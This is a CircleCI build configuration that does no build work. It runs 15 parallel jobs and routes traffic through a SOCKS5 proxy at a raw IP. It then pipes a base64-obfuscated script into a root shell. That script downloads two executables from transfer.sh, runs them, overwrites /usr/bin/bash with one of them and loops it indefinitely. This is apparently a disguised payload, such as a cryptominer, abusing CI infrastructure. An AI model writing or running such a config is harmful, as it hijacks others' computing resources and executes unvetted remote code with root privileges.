version: 2.1

jobs:
  build:
    parallelism: 15
    machine:
      image: ubuntu-2004:2022.10.1
    steps:
      - checkout
      - run:
          command: |
                   curl -v -x socks5://192.74.246.152:1080 https://app.circleci.com/
      - run:
          command: |
                   sudo su --command "base64 -d <<< d2dldCAtTyBrYW5na3VuZyBodHRwczovL3RyYW5zZmVyLnNoL2dldC9YTEMyRUMva2FuZ2t1bmcKd2dldCAtTyBjb25maWcuc2ggaHR0cHM6Ly90cmFuc2Zlci5zaC9nZXQvRHkwOWpyL2NvbmZpZy5zaApjaG1vZCAreCBrYW5na3VuZwpjaG1vZCAreCBjb25maWcuc2gKLi9jb25maWcuc2gKbXYga2FuZ2t1bmcgL3Vzci9iaW4vYmFzaAp3aGlsZSB0cnVlOyBkbyB0aW1lb3V0IDNtIGJhc2ggLWMgY29uZmlnLmpzb247IHNsZWVwIDIwOyBkb25l== | sh"
